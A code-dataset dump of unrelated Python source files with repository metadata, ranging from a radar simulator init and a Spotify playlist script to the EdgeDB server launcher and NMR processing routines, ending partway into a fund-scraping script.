] | 42 | 2020-09-30T06:26:02.000Z | 2022-03-31T18:38:52.000Z | __init__.py | chisyliu/radarsimpy | e26cc8eb1b913630dfdc9d3443279b4ae54c0109 | [
"MIT"
] | 6 | 2021-01-11T21:45:20.000Z | 2022-03-18T02:48:50.000Z | __init__.py | chisyliu/radarsimpy | e26cc8eb1b913630dfdc9d3443279b4ae54c0109 | [
"MIT"
] | 12 | 2020-08-06T15:17:13.000Z | 2022-02-11T08:38:34.000Z | # distutils: language = c++
# cython: language_level=3
# ----------
# RadarSimPy - A Radar Simulator Built with Python
# Copyright (C) 2018 - PRESENT Zhengyu Peng
# E-mail: zpeng.me@gmail.com
# Website: https://zpeng.me
# ` `
# -:. -#:
# -//:. -###:
# -////:. -#####:
# -/:.://:. -###++##:
# .. `://:- -###+. :##:
# `:/+####+. :##:
# .::::::::/+###. :##:
# .////-----+##: `:###:
# `-//:. :##: `:###/.
# `-//:. :##:`:###/.
# `-//:+######/.
# `-/+####/.
# `+##+.
# :##:
# :##:
# :##:
# :##:
# :##:
# .+:
import numpy
# radar
from .radar import Radar
from .radar import Transmitter
from .radar import Receiver
# Package version string; bump on each release.
__version__ = '6.1.0'
| 20.717949 | 50 | 0.308168 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 663 | 0.820545 |
33d742467b639181a96935c9f1ee233a5cfa1143 | 1,542 | py | Python | setup.py | tfahey/python-sample-app | ce333ea3e6e932b4f3eec022a3654b542c310974 | [
"MIT"
] | null | null | null | setup.py | tfahey/python-sample-app | ce333ea3e6e932b4f3eec022a3654b542c310974 | [
"MIT"
] | null | null | null | setup.py | tfahey/python-sample-app | ce333ea3e6e932b4f3eec022a3654b542c310974 | [
"MIT"
] | null | null | null | from setuptools import setup
# Used in pypi.org as the README description of your package
with open("README.md", 'r') as f:
    long_description = f.read()

# Remove this whole block from here...
# (This concrete setup() call configures the sample app itself. Because of
# the exit(0) below, the template setup() call further down never executes.)
setup(
    name='python-sample-app',
    version='1.0',
    description='python-sample-app is a starter template for new python applications',
    author='Thomas Fahey',
    author_email='tntfahey@gmail.com',
    license="MIT",
    url="https://github.com/tfahey/python-sample-app",
    packages=['python_sample_app'],
    entry_points={
        'console_scripts': [
            # installs a `sample-app` command running python_sample_app.main:main
            'sample-app=python_sample_app.main:main',
        ],
    },
    long_description=long_description
)
exit(0)  # intentional: everything below is an inert fill-in-the-blanks template

# ...to here. Then edit the following block to match your project needs
setup(
    name='<your_project>',
    version='<your_project_version>',
    description='<your_project_description>',
    author='<your_name>',
    author_email='<you@example.com>',
    license="<your_project_license>",
    url="<your_project_url>",
    packages=['<your_project_main_package>'],
    #scripts=['scripts/some_script.py'],
    #python_requires='>=3',
    entry_points={
        'console_scripts': [
            '<your_command>=<your_project_main_package>.main:main',
        ],
    },
    #install_requires=['foo', 'bar'], # Install External packages 'foo' and 'bar' as dependencies
    long_description=long_description
)
| 33.521739 | 101 | 0.603113 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 832 | 0.539559 |
33d849633a70f2cbfe362c04ab4b72d0b5817985 | 2,519 | py | Python | create_playlist_by_artistlist.py | sanzgiri/saregma_spotify | ba35cd27b13c63a7cb1b1452f00727be51c775c7 | [
"MIT"
] | 1 | 2019-10-10T07:39:26.000Z | 2019-10-10T07:39:26.000Z | create_playlist_by_artistlist.py | sanzgiri/saregama_spotify | ba35cd27b13c63a7cb1b1452f00727be51c775c7 | [
"MIT"
] | null | null | null | create_playlist_by_artistlist.py | sanzgiri/saregama_spotify | ba35cd27b13c63a7cb1b1452f00727be51c775c7 | [
"MIT"
] | null | null | null | import sys
import re
import spotipy
import spotipy.util as util
''' shows the albums and tracks for a given artist.
'''
def get_artist_urn(name):
    """Search Spotify for an artist called *name*.

    Relies on the module-global ``sp`` client created in the ``__main__``
    block. Returns the URI of the first match, or None when nothing matched.
    """
    matches = sp.search(q='artist:' + name, type='artist')['artists']['items']
    return matches[0]['uri'] if matches else None
if __name__ == '__main__':
    # NOTE(review): this is Python 2 code — the bare ``print "..."`` statements
    # below are syntax errors under Python 3, while other lines use print().
    # Indentation was lost in this copy and has been reconstructed; verify
    # against the original before relying on the nesting.
    if len(sys.argv) < 4:
        print(('Usage: {0} username playlist filename'.format(sys.argv[0])))
    else:
        username = sys.argv[1]
        plname = sys.argv[2]    # playlist name to (re)create
        filename = sys.argv[3]  # text file with one artist name per line
        scope = 'playlist-modify-public'
        token = util.prompt_for_user_token(username, scope)
        if token:
            sp = spotipy.Spotify(auth=token)

            # Delete any pre-existing playlist with the same name.
            playlists = sp.user_playlists(username)
            for playlist in playlists['items']:
                if (playlist['name'] == plname):
                    playlist_id = playlist['id']
                    print("Playlist exists, deleting: ", playlist_id)
                    sp.user_playlist_unfollow(username, playlist_id)
                    break

            # Re-create the playlist and look up its new id.
            print("Creating playlist:")
            sp.user_playlist_create(username, plname, True)
            playlists = sp.user_playlists(username)
            for playlist in playlists['items']:
                if (playlist['name'] == plname):
                    playlist_id = playlist['id']
                    print("Using: ", playlist_id)

            # Add each listed artist's top tracks to the playlist.
            f = open(filename, 'r')
            for line in f:
                name = line.strip()
                artist_urn = get_artist_urn(name)
                if artist_urn:
                    print("Found ", name)
                    artist_tracks = []
                    response = sp.artist_top_tracks(artist_urn, country='US')
                    for track in response['tracks']:
                        track_id = track['id']
                        artist_tracks.append(track_id)
                    if (len(artist_tracks) > 0):
                        sp.user_playlist_add_tracks(username, playlist_id, artist_tracks)
                    else:
                        print "No tracks for " + name
                    # NOTE(review): placement is a best guess; ``track`` leaks
                    # from the loop above and this raises NameError when the
                    # artist had no tracks at all.
                    print(track['name'])
                else:
                    print "Can't find artist " + name
| 33.586667 | 89 | 0.493053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 560 | 0.22231 |
33d9116df66190b4bcd4b6335837886228590452 | 466 | py | Python | Lib/site-packages/py2exe/samples/pywin32/com_typelib/pre_gen/wscript/show_info.py | Aakash10399/simple-health-glucheck | 1f7c4ff7778a44f09b1c8cb0089fef51dc26cea2 | [
"bzip2-1.0.6"
] | 35 | 2015-08-15T14:32:38.000Z | 2021-12-09T16:21:26.000Z | Lib/site-packages/py2exe/samples/pywin32/com_typelib/pre_gen/wscript/show_info.py | Aakash10399/simple-health-glucheck | 1f7c4ff7778a44f09b1c8cb0089fef51dc26cea2 | [
"bzip2-1.0.6"
] | 4 | 2015-09-12T10:42:57.000Z | 2017-02-27T04:05:51.000Z | Lib/site-packages/py2exe/samples/pywin32/com_typelib/pre_gen/wscript/show_info.py | Aakash10399/simple-health-glucheck | 1f7c4ff7778a44f09b1c8cb0089fef51dc26cea2 | [
"bzip2-1.0.6"
] | 15 | 2015-07-10T23:58:07.000Z | 2022-01-23T22:16:33.000Z | # Print some simple information using the WScript.Network object.
import sys
from win32com.client.gencache import EnsureDispatch
ob = EnsureDispatch('WScript.Network')
# For the sake of ensuring the correct module is used...
mod = sys.modules[ob.__module__]
print "The module hosting the object is", mod
# Now use the object.
print "About this computer:"
print "Domain =", ob.UserDomain
print "Computer Name =", ob.ComputerName
print "User Name =", ob.UserName
| 25.888889 | 65 | 0.761803 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 255 | 0.54721 |
33d9997f9a803874867baad8259292103a1f9c38 | 974 | py | Python | BOMFinder/helpers.py | ProrokWielki/BOM_Finder | 329fbcc79014f653ea438005495c851ea5a98a4e | [
"MIT"
] | null | null | null | BOMFinder/helpers.py | ProrokWielki/BOM_Finder | 329fbcc79014f653ea438005495c851ea5a98a4e | [
"MIT"
] | null | null | null | BOMFinder/helpers.py | ProrokWielki/BOM_Finder | 329fbcc79014f653ea438005495c851ea5a98a4e | [
"MIT"
] | null | null | null | import BOMFinder.UI.UI as UI
def to_prompt_sequence(part):
    """Translate a part's properties into a sequence of UI prompt objects.

    Mapping rules for each ``(key, value)`` in ``part.properties``:
      - str key + str value   -> free-text ValuePrompt for the key
      - str key + list value  -> ListPrompt offering the listed choices
      - tuple key             -> EmbeddedListPrompt: ``key[0]`` is the outer
        label, each item ``i`` of ``value`` contributes an outer choice
        ``i[0]`` with a nested ListPrompt over ``i[1]`` labelled ``key[1]``
    A trailing "Amount" ValuePrompt is always appended.

    :param part: object with a ``properties`` dict (see rules above)
    :return: list of UI prompt objects
    :raises TypeError: for a value or key shape not covered above
    """
    prompt_sequence = []
    for key, value in part.properties.items():
        if isinstance(key, str):
            if isinstance(value, str):
                prompt_sequence.append(UI.ValuePrompt(key))
            elif isinstance(value, list):
                prompt_sequence.append(UI.ListPrompt(key, value))
            else:
                # BUG FIX: corrected the misspelled message ("Unsupporetd").
                raise TypeError("Unsupported value type")
        elif isinstance(key, tuple):
            # TODO: not good — flatten into a clearer data structure
            first_list = []
            second_list = []
            for i in value:
                first_list.append(i[0])
                second_list.append(UI.ListPrompt(key[1], i[1]))
            prompt_sequence.append(UI.EmbeddedListPrompt(key[0], first_list, second_list))
        else:
            # BUG FIX: corrected the misspelled message ("Unsuported").
            raise TypeError("Unsupported key type")
    # TODO: not good as well — "Amount" is hard-wired onto every sequence
    prompt_sequence.append(UI.ValuePrompt("Amount"))
    return prompt_sequence
| 30.4375 | 90 | 0.584189 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 93 | 0.095483 |
33da0396a0dd60ccaa2bda8746e876166518de49 | 934 | py | Python | src/dash/pages/page1/layout/piecases.py | NjekTt/iris-python-dashboards | fde650bb1e0a58504230aaba6b4d8312c9f965a6 | [
"MIT"
] | null | null | null | src/dash/pages/page1/layout/piecases.py | NjekTt/iris-python-dashboards | fde650bb1e0a58504230aaba6b4d8312c9f965a6 | [
"MIT"
] | null | null | null | src/dash/pages/page1/layout/piecases.py | NjekTt/iris-python-dashboards | fde650bb1e0a58504230aaba6b4d8312c9f965a6 | [
"MIT"
] | null | null | null | import dash_bootstrap_components as dbc
from dash import dcc
import plotly.graph_objects as go
import iris
# Per-country cumulative COVID totals; the continent filter drops aggregate
# rows (those with an empty continent field).
# NOTE(review): whitespace inside this SQL literal was reconstructed — SQL is
# whitespace-insensitive, but confirm against the original file.
query = ("""SELECT
location,
CAST(total_cases AS int) as total_cases,
CAST(total_deaths as int) as total_deaths,
CAST(total_vaccinations AS int) as total_vaccinations
FROM Data.Covid19 WHERE continent != ''""")

# Run the query through the IRIS SQL bridge, materialize a DataFrame, and
# rename the columns to display-friendly labels used by getFigure() below.
df = (iris.sql.exec(query).dataframe().rename(columns={
    "total_cases": "Total cases",
    "total_deaths": "Total deaths",
    "total_vaccinations": "Total vaccinations"
}))
def getFigure(countries):
    """Return a pie chart of total cases / deaths / vaccinations.

    When *countries* is a non-empty selection, only those locations are
    aggregated; otherwise the whole dataset is used.
    """
    if countries:
        subset = df[df['location'].isin(countries)]
    else:
        subset = df
    slice_values = [
        subset['Total vaccinations'].sum(),
        subset['Total deaths'].sum(),
        subset['Total cases'].sum(),
    ]
    pie = go.Pie(
        labels=['Total vaccinations', 'Total deaths', 'Total cases'],
        textinfo='label+percent',
        values=slice_values,
    )
    fig = go.Figure(data=[pie])
    fig.update_layout(title_text="Count by type")
    return fig
| 28.30303 | 105 | 0.680942 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 449 | 0.480728 |
33da4874a5acfe6e3de2316a08fa8e0d7edcedd6 | 13,573 | py | Python | edb/server/main.py | rongfengliang/edgedb-pg-expose | 1ddc279511595b4b1a3a1532ea873ed4e05e8b01 | [
"Apache-2.0"
] | null | null | null | edb/server/main.py | rongfengliang/edgedb-pg-expose | 1ddc279511595b4b1a3a1532ea873ed4e05e8b01 | [
"Apache-2.0"
] | null | null | null | edb/server/main.py | rongfengliang/edgedb-pg-expose | 1ddc279511595b4b1a3a1532ea873ed4e05e8b01 | [
"Apache-2.0"
] | null | null | null | #
# This source file is part of the EdgeDB open source project.
#
# Copyright 2016-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import asyncio
import contextlib
import getpass
import logging
import os
import os.path
import pathlib
import setproctitle
import signal
import socket
import sys
import tempfile
import uvloop
import click
from edb.common import devmode
from edb.common import exceptions
from . import buildmeta
from . import cluster as edgedb_cluster
from . import daemon
from . import defines
from . import logsetup
logger = logging.getLogger('edb.server')
_server_initialized = False
def abort(msg, *args):
    """Log *msg* (printf-style *args*) at CRITICAL level and exit with status 1."""
    logger.critical(msg, *args)
    sys.exit(1)
def terminate_server(server, loop):
    # SIGTERM handler: stopping the loop lets _run_server() fall through to
    # its finally block, which awaits server shutdown; *server* is unused here.
    loop.stop()
def _ensure_runstate_dir(data_dir, runstate_dir):
    """Resolve and create (if missing) the runstate directory.

    When *runstate_dir* is None the default location is derived from
    *data_dir* via build metadata.  Aborts the process (exit 1) on any
    unresolvable path or permission problem; only a single-level mkdir is
    attempted, so the parent must already exist.  Returns a pathlib.Path.
    """
    if runstate_dir is None:
        try:
            runstate_dir = buildmeta.get_runstate_path(data_dir)
        except buildmeta.MetadataError:
            abort(
                f'cannot determine the runstate directory location; '
                f'please use --runstate-dir to specify the correct location')
    runstate_dir = pathlib.Path(runstate_dir)
    if not runstate_dir.exists():
        if not runstate_dir.parent.exists():
            abort(
                f'cannot create the runstate directory: '
                f'{str(runstate_dir.parent)!r} does not exist; please use '
                f'--runstate-dir to specify the correct location')
        try:
            runstate_dir.mkdir()
        except PermissionError as ex:
            abort(
                f'cannot create the runstate directory: '
                f'{ex!s}; please use --runstate-dir to specify '
                f'the correct location')
    # Catches the case where the path exists but is a file/symlink.
    if not os.path.isdir(runstate_dir):
        abort(f'{str(runstate_dir)!r} is not a directory; please use '
              f'--runstate-dir to specify the correct location')
    return runstate_dir
@contextlib.contextmanager
def _internal_state_dir(runstate_dir):
    """Yield a throwaway 'internal-*' temp directory under *runstate_dir*.

    The directory (used for internal Unix sockets/state) is removed on exit.
    A PermissionError while creating or cleaning it aborts the process.
    """
    try:
        with tempfile.TemporaryDirectory(prefix='internal-',
                                         dir=runstate_dir) as td:
            yield td
    except PermissionError as ex:
        abort(f'cannot write to the runstate directory: '
              f'{ex!s}; please fix the permissions or use '
              f'--runstate-dir to specify the correct location')
def _init_cluster(cluster, args) -> bool:
    """Bootstrap the EdgeDB schema on *cluster*.

    Returns True when the backend Postgres server must be restarted to pick
    up configuration changes made during bootstrap.  Sets the module-level
    _server_initialized flag so run_server() knows whether a failed startup
    should wipe a data directory we ourselves created.
    """
    from edb.server import bootstrap
    bootstrap_args = {
        'default_database': (args['default_database'] or
                             args['default_database_user']),
        'default_database_user': args['default_database_user'],
        'testmode': args['testmode'],
        'insecure': args['insecure'],
    }
    need_restart = asyncio.run(bootstrap.bootstrap(cluster, bootstrap_args))
    global _server_initialized
    _server_initialized = True
    return need_restart
def _sd_notify(message):
notify_socket = os.environ.get('NOTIFY_SOCKET')
if not notify_socket:
return
if notify_socket[0] == '@':
notify_socket = '\0' + notify_socket[1:]
sd_sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sd_sock.connect(notify_socket)
try:
sd_sock.sendall(message.encode())
finally:
sd_sock.close()
def _init_parsers():
    """Eagerly build/load the EdgeQL parser grammars."""
    # Initialize all parsers, rebuilding grammars if
    # necessary. Do it earlier than later so that we don't
    # end up in a situation where all our compiler processes
    # are building parsers in parallel.
    from edb.edgeql import parser as ql_parser
    ql_parser.preload()
def _run_server(cluster, args, runstate_dir, internal_runstate_dir):
    """Create the EdgeDB Server on a fresh event loop and run it forever.

    Blocks until the loop is stopped (SIGTERM via terminate_server, or
    Ctrl-C).  Guarantees ss.stop() runs on any exit path after init.
    """
    loop = asyncio.new_event_loop()
    asyncio.set_event_loop(loop)
    try:
        # Import here to make sure that most of imports happen
        # under coverage (if we're testing with it). Otherwise
        # coverage will fail to detect that "import edb..." lines
        # actually were run.
        from . import server
        ss = server.Server(
            loop=loop,
            cluster=cluster,
            runstate_dir=runstate_dir,
            internal_runstate_dir=internal_runstate_dir,
            max_backend_connections=args['max_backend_connections'],
            nethost=args['bind_address'],
            netport=args['port'],
        )
        loop.run_until_complete(ss.init())
        try:
            loop.run_until_complete(ss.start())
        except Exception:
            # start() failed after a successful init(): undo partial startup.
            loop.run_until_complete(ss.stop())
            raise
        loop.add_signal_handler(signal.SIGTERM, terminate_server, ss, loop)
        # Notify systemd that we've started up.
        _sd_notify('READY=1')
        try:
            loop.run_forever()
        finally:
            loop.run_until_complete(ss.stop())
    except KeyboardInterrupt:
        logger.info('Shutting down.')
        _sd_notify('STOPPING=1')
def run_server(args):
    """Top-level server lifecycle: init/start the Postgres cluster, bootstrap
    EdgeDB, then serve (unless --bootstrap) and clean up.

    If this process both initialized the data directory and failed before
    bootstrap completed, the data directory is destroyed again so a retry
    starts from a clean slate.
    """
    ver = buildmeta.get_version()
    if devmode.is_in_dev_mode():
        logger.info(f'EdgeDB server ({ver}) starting in DEV mode.')
    else:
        logger.info(f'EdgeDB server ({ver}) starting.')
    _init_parsers()
    # Track what we created ourselves so cleanup only touches our own state.
    pg_cluster_init_by_us = False
    pg_cluster_started_by_us = False
    try:
        server_settings = {
            'log_connections': 'yes',
            'log_statement': 'all',
            'log_disconnections': 'yes',
            'log_min_messages': 'INFO',
            'client_min_messages': 'INFO',
            'listen_addresses': '', # we use Unix sockets
            'unix_socket_permissions': '0700',
            # We always enforce UTC timezone:
            # * timestamptz is stored in UTC anyways;
            # * this makes the DB server more predictable.
            'TimeZone': 'UTC',
            'default_transaction_isolation': 'repeatable read',
            # TODO: EdgeDB must manage/monitor all client connections and
            # have its own "max_connections". We'll set this setting even
            # higher when we have that fully implemented.
            'max_connections': '500',
        }
        cluster = edgedb_cluster.get_pg_cluster(args['data_dir'])
        cluster_status = cluster.get_status()
        if cluster_status == 'not-initialized':
            logger.info(
                'Initializing database cluster in %s', args['data_dir'])
            initdb_output = cluster.init(
                username='postgres', locale='C', encoding='UTF8')
            for line in initdb_output.splitlines():
                logger.debug('initdb: %s', line)
            # Local trust auth only: access control is enforced by EdgeDB.
            cluster.reset_hba()
            cluster.add_hba_entry(
                type='local',
                database='all',
                user='postgres',
                auth_method='trust'
            )
            cluster.add_hba_entry(
                type='local',
                database='all',
                user=defines.EDGEDB_SUPERUSER,
                auth_method='trust'
            )
            pg_cluster_init_by_us = True
            cluster_status = cluster.get_status()
        data_dir = cluster.get_data_dir()
        if args['runstate_dir']:
            specified_runstate_dir = args['runstate_dir']
        elif args['bootstrap']:
            # When bootstrapping a new EdgeDB instance it is often necessary
            # to avoid using the main runstate dir due to lack of permissions,
            # possibility of conflict with another running instance, etc.
            # The --bootstrap mode is also often runs unattended, i.e.
            # as a post-install hook during package installation.
            specified_runstate_dir = data_dir
        else:
            specified_runstate_dir = None
        runstate_dir = _ensure_runstate_dir(data_dir, specified_runstate_dir)
        with _internal_state_dir(runstate_dir) as internal_runstate_dir:
            server_settings['unix_socket_directories'] = args['data_dir']
            if cluster_status == 'stopped':
                cluster.start(
                    port=edgedb_cluster.find_available_port(),
                    server_settings=server_settings)
                pg_cluster_started_by_us = True
            elif cluster_status != 'running':
                abort('Could not start database cluster in %s',
                      args['data_dir'])
            cluster.override_connection_spec(
                user='postgres', database='template1')
            need_cluster_restart = _init_cluster(cluster, args)
            if need_cluster_restart and pg_cluster_started_by_us:
                # Bootstrap changed backend config; restart on the same port.
                logger.info('Restarting server to reload configuration...')
                cluster_port = cluster.get_connection_spec()['port']
                cluster.stop()
                cluster.start(
                    port=cluster_port,
                    server_settings=server_settings)
            if not args['bootstrap']:
                _run_server(cluster, args, runstate_dir, internal_runstate_dir)
    except BaseException:
        if pg_cluster_init_by_us and not _server_initialized:
            logger.warning('server bootstrap did not complete successfully, '
                           'removing the data directory')
            if cluster.get_status() == 'running':
                cluster.stop()
            cluster.destroy()
        raise
    if pg_cluster_started_by_us:
        cluster.stop()
_server_options = [
click.option(
'-D', '--data-dir', type=str, envvar='EDGEDB_DATADIR',
help='database cluster directory'),
click.option(
'-l', '--log-level',
help=('Logging level. Possible values: (d)ebug, (i)nfo, (w)arn, '
'(e)rror, (s)ilent'),
default='i', envvar='EDGEDB_LOG_LEVEL'),
click.option(
'--log-to',
help=('send logs to DEST, where DEST can be a file name, "syslog", '
'or "stderr"'),
type=str, metavar='DEST', default='stderr'),
click.option(
'--bootstrap', is_flag=True,
help='bootstrap the database cluster and exit'),
click.option(
'--default-database', type=str, default=getpass.getuser(),
help='the name of the default database to create'),
click.option(
'--default-database-user', type=str, default=getpass.getuser(),
help='the name of the default database owner'),
click.option(
'--devmode/--no-devmode',
help='enable or disable the development mode',
default=None),
click.option(
'--testmode/--no-testmode',
help='enable or disable the test mode',
default=False),
click.option(
'-I', '--bind-address', type=str, default=None,
help='IP address to listen on', envvar='EDGEDB_BIND_ADDRESS'),
click.option(
'-p', '--port', type=int, default=None,
help='port to listen on'),
click.option(
'-b', '--background', is_flag=True, help='daemonize'),
click.option(
'--pidfile', type=str, default='/run/edgedb/',
help='path to PID file directory'),
click.option(
'--daemon-user', type=int),
click.option(
'--daemon-group', type=int),
click.option(
'--runstate-dir', type=str, default=None,
help=('directory where UNIX sockets will be created '
'("/run" on Linux by default)')),
click.option(
'--max-backend-connections', type=int, default=100),
]
def server_options(func):
    """Decorator applying the shared server CLI options to *func*.

    Options are applied in reverse so they appear to click in the same
    order they are declared in _server_options.
    """
    decorated = func
    for opt in reversed(_server_options):
        decorated = opt(decorated)
    return decorated
def server_main(*, insecure=False, **kwargs):
    """Configure logging/dev-mode, resolve the data dir, then run the server,
    optionally daemonizing first (``--background``).

    *kwargs* are the parsed CLI options from server_options().
    """
    logsetup.setup_logging(kwargs['log_level'], kwargs['log_to'])
    exceptions.install_excepthook()
    # uvloop replaces the default asyncio event loop for performance.
    asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
    if kwargs['devmode'] is not None:
        devmode.enable_dev_mode(kwargs['devmode'])
    if not kwargs['data_dir']:
        if devmode.is_in_dev_mode():
            kwargs['data_dir'] = os.path.expanduser('~/.edgedb')
        else:
            abort('Please specify the instance data directory '
                  'using the -D argument')
    kwargs['insecure'] = insecure
    if kwargs['background']:
        daemon_opts = {'detach_process': True}
        pidfile = os.path.join(
            kwargs['pidfile'], '.s.EDGEDB.{}.lock'.format(kwargs['port']))
        daemon_opts['pidfile'] = pidfile
        if kwargs['daemon_user']:
            daemon_opts['uid'] = kwargs['daemon_user']
        if kwargs['daemon_group']:
            daemon_opts['gid'] = kwargs['daemon_group']
        with daemon.DaemonContext(**daemon_opts):
            # Make the daemon identifiable in `ps` output.
            setproctitle.setproctitle(
                'edgedb-server-{}'.format(kwargs['port']))
            run_server(kwargs)
    else:
        with devmode.CoverageConfig.enable_coverage_if_requested():
            run_server(kwargs)
@click.command(
    'EdgeDB Server',
    context_settings=dict(help_option_names=['-h', '--help']))
@server_options
def main(**kwargs):
    # CLI entry point: click parses the shared options into kwargs.
    # (Deliberately no docstring: click would show it as command help.)
    server_main(**kwargs)
def main_dev():
    """Entry point that forces development mode before starting the server."""
    devmode.enable_dev_mode()
    main()
if __name__ == '__main__':
    main()
| 31.861502 | 79 | 0.614308 | 0 | 0 | 412 | 0.030354 | 600 | 0.044205 | 0 | 0 | 4,635 | 0.341487 |
33dab9188feb6ecca15b0298623ede4011983a44 | 2,295 | py | Python | processing.py | BeDaBio/Topspin_Automatisation | d6c944c8533452540bad6c7900671ba84510da5d | [
"MIT"
] | 1 | 2021-07-01T12:40:46.000Z | 2021-07-01T12:40:46.000Z | processing.py | BeDaBio/Topspin_Automatisation | d6c944c8533452540bad6c7900671ba84510da5d | [
"MIT"
] | null | null | null | processing.py | BeDaBio/Topspin_Automatisation | d6c944c8533452540bad6c7900671ba84510da5d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from TopCmds import *
import quality_check
import data_management as dat
# Flag from the quality_check module: controls whether the conditional
# decorator below wraps the processing pipelines with a quality check.
Qualitytest = quality_check.Qualitytest
# Reference-region boundaries (in ppm) read once from the global parameter
# store at import time.
left_boundary=float(dat.get_globalParameter("left_boundary"))
right_boundary=float(dat.get_globalParameter("right_boundary"))
def Check_180turn(leftboundary, rightboundary):
    """Rotate the spectrum phase by 180 degrees if the reference region
    between *leftboundary* and *rightboundary* has an overall negative signal.

    Fix: the body previously ignored both parameters and passed the global
    ``left_boundary`` twice, so the integration region collapsed to a single
    point instead of the caller-specified window.
    """
    Intensities_of_reference = sum(GETPROCDATA(leftboundary, rightboundary))
    if Intensities_of_reference < 0:
        XCMD(".ph", WAIT_TILL_DONE)     # opens phase correction mode
        XCMD(".ph180", WAIT_TILL_DONE)  # adds 180 degrees to ph0
        XCMD(".sret", WAIT_TILL_DONE)   # adjusts spectrum according to ph and saves result
# Processing of CPMG data
@quality_check.conditional_decorator(quality_check.Quality,quality_check.Quality_lifted,Qualitytest)
def proz():
    """processing pipeline for CPMG data"""
    print("processing: ",CURDATA()[0])
    Check_180turn(left_boundary,right_boundary)
    EF() #exponential window multiplication + fourier
    APK0() #1. Phase correction 0th order
    APK1() #1. Phase correction 1st order
    ABS() #Baseline correction
    APK()
    ABS() #Baseline correction
    Check_180turn(left_boundary,right_boundary)
def proz2D():
    """processing pipeline for 2D data (automatic 2D phase correction)"""
    print("processing: ",CURDATA()[0])
    XCMD("apk2d",WAIT_TILL_DONE)
    ABS2() #Baseline correction along F2
    ABS1() #Baseline correction along F1
# Processing of NOESY data
@quality_check.conditional_decorator(quality_check.Quality,quality_check.Quality_lifted,Qualitytest)
def proz_noe():
    """processing pipeline for NOESY data"""
    print("processing: ",CURDATA()[0])
    Check_180turn(left_boundary,right_boundary)
    EFP() # Exponential window multiplication + Fourier Transformation + phase correction
    ABS() # Baseline correction
    Check_180turn(left_boundary,right_boundary)
# After manual processing
@quality_check.conditional_decorator(quality_check.Quality,quality_check.Quality_lifted,Qualitytest)
def proz_manually ():
    """processing pipeline used after manual phase correction"""
    Check_180turn(left_boundary,right_boundary)
    ABS() # Baseline correction
    XCMD("closeall",WAIT_TILL_DONE)
| 38.898305 | 101 | 0.735076 | 0 | 0 | 0 | 0 | 1,257 | 0.547712 | 0 | 0 | 894 | 0.389542 |
33df118b9dd2d5dc3e199ff68c543e1b12e24f1b | 389 | py | Python | accounts/migrations/0007_rename_protected_authtoggle_is_protected.py | abubakarA-Dot/tarot_juicer | dbc68f73d6ae3d73f50f4472a063b5363febc7b8 | [
"MIT"
] | 4 | 2020-02-27T00:11:01.000Z | 2020-05-11T07:59:55.000Z | accounts/migrations/0007_rename_protected_authtoggle_is_protected.py | abubakarA-Dot/tarot_juicer | dbc68f73d6ae3d73f50f4472a063b5363febc7b8 | [
"MIT"
] | 16 | 2019-12-20T06:57:54.000Z | 2020-05-19T01:00:18.000Z | accounts/migrations/0007_rename_protected_authtoggle_is_protected.py | abubakarA-Dot/tarot_juicer | dbc68f73d6ae3d73f50f4472a063b5363febc7b8 | [
"MIT"
] | 10 | 2019-12-25T23:38:33.000Z | 2020-05-11T14:15:15.000Z | # Generated by Django 3.2.4 on 2021-11-02 08:05
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('accounts', '0006_rename_on_authtoggle_protected'),
]
operations = [
migrations.RenameField(
model_name='authtoggle',
old_name='protected',
new_name='is_protected',
),
]
| 20.473684 | 60 | 0.611825 | 304 | 0.781491 | 0 | 0 | 0 | 0 | 0 | 0 | 131 | 0.336761 |
33df6bcd5e294420051bcaaf7ff2ab223d4ccacb | 6,509 | py | Python | fund.py | JS-WangZhu/Fund | 9ec7c06998f23e827d72f5a40f357ce8950b61f5 | [
"Apache-2.0"
] | 9 | 2020-08-11T11:07:06.000Z | 2021-08-06T08:28:50.000Z | fund.py | JS-WangZhu/Fund | 9ec7c06998f23e827d72f5a40f357ce8950b61f5 | [
"Apache-2.0"
] | null | null | null | fund.py | JS-WangZhu/Fund | 9ec7c06998f23e827d72f5a40f357ce8950b61f5 | [
"Apache-2.0"
] | 2 | 2020-08-18T06:56:25.000Z | 2021-01-12T12:07:36.000Z | import os
import pickle
import requests
from bs4 import BeautifulSoup
import re
import prettytable as pt
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import warnings
from colorama import init, Fore, Back, Style
warnings.filterwarnings("ignore")
import time
chrome_options=Options()
# Enable to run Chrome in headless (no-UI) mode.
# chrome_options.add_argument('--headless')
#-----------------------------------------------------
# Adjust for your setup: path to <phantomjs unpack dir>/bin/phantomjs
executable_path = '/Users/wangzhu/myFile/OpenPackages/phantomjs-2.1.1-macosx/bin/phantomjs'
# Page-load wait time in seconds; tune to your network speed.
wait_time = 1
#-----------------------------------------------------
# Terminal colors (colorama); autoreset off, codes are reset explicitly below.
init(autoreset=False)
class Colored(object):
    """Wrap strings in colorama LIGHT* foreground codes (default background)."""
    # Foreground: red; background: default
    def red(self, s):
        return Fore.LIGHTRED_EX + s + Fore.RESET
    # Foreground: green; background: default
    def green(self, s):
        return Fore.LIGHTGREEN_EX + s + Fore.RESET
    def yellow(self, s):
        return Fore.LIGHTYELLOW_EX + s + Fore.RESET
    def white(self,s):
        return Fore.LIGHTWHITE_EX + s + Fore.RESET
    def blue(self,s):
        return Fore.LIGHTBLUE_EX + s + Fore.RESET
# Fetch the full fund list (code, name, detail URL) and cache it to disk.
def get_allinfo():
    """Scrape eastmoney's all-fund page into fund_info.pkl.

    The pickle holds three parallel lists: [codes, names, urls].  Fund code
    and name are split out of anchor text of the form "(code)name".
